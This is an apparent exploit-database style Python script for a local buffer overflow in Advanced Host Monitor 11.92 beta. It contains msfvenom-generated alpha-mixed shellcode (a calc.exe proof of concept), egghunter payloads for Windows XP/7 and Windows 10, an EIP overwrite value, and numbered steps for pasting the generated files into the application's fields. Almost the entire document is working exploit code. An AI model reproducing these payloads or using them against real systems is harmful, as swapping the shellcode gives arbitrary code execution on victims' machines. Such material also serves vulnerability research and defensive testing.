#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter)                                                      #
# Date: 2019-03-18                                                                                                                   #
# Author: Peyman Forouzan                                                                                                            #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit                                   #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe                                                                  #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe                                                                 #
# Version: 11.92 beta                                                                                                                #
# The Program also has SEH Overflow, Which can be implemented in a similar way                                                       #
# Special Thanks to my wife                                                                                                          #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close        #
#         Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or                   #
#         egghunter-win10.txt (depend on your windows version) into "load specific HTML file" --> Save --> Wait a litle -->          #
#         Shellcode (Calc) open                                                                                                      #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite                                                            #
#------------------------------------------------------------------------------------------------------------------------------------#

#---------------------------------------------------   EGG Shellcode Generation    ---------------------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#-----------------------------------------------   EGG Hunter Shellcode Generation    ----------------------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters 

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter =  "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 =  "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

eip = "\x4d\x37\x41"

buffer = egghunter + "\x41" * (268 - len(egghunter)) + eip

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (268 - len(egghunter10)) + eip
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()